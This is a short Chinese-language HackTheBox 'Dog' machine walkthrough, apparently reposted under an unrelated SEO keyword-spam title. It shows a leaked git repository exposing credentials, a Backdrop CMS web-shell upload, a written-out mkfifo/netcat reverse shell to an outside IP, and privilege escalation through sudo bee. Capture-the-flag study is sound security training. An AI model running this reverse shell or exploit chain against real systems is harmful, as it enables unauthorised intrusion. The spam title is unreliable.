当前位置: 首页> 文旅> 酒店 > 高中作文网站_下载软件app排行榜_北京seo专业团队_韶关新闻最新今日头条

高中作文网站_下载软件app排行榜_北京seo专业团队_韶关新闻最新今日头条

时间:2025/7/25 23:06:19来源:https://blog.csdn.net/m0_46261647/article/details/146163682 浏览次数:0次
高中作文网站_下载软件app排行榜_北京seo专业团队_韶关新闻最新今日头条

1、使用nmap扫描,发现git泄露,下载git泄露文件,由于是邮箱登录,全局搜索htb,发现账号

tiffany@dog.htb

2、查看setting.php,发现密码

BackDropJ2024DS2024

3、登录后台
在这里插入图片描述

4、参考exp,生成shell文件,由于cms限制只能上传tar压缩包,我们需要进行压缩

tar czf shell.tar shell

https://www.exploit-db.com/exploits/52021

5、上传该压缩包,然后访问

http://dog.htb/modules/shell/shell.php

在这里插入图片描述

6、使用该命令反弹
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.31 4444 >/tmp/f

7、

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

8、登录后,查看home文件,发现两个用户名,尝试ssh登录,johncusack登录成功

在这里插入图片描述

9、拿到user flag

10、sudo -l查看可以使用bee,看一下help,发现可以执行命令,指定backdropcms的安装位置,执行打印命令即可得到root flag
在这里插入图片描述

关键字:高中作文网站_下载软件app排行榜_北京seo专业团队_韶关新闻最新今日头条

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: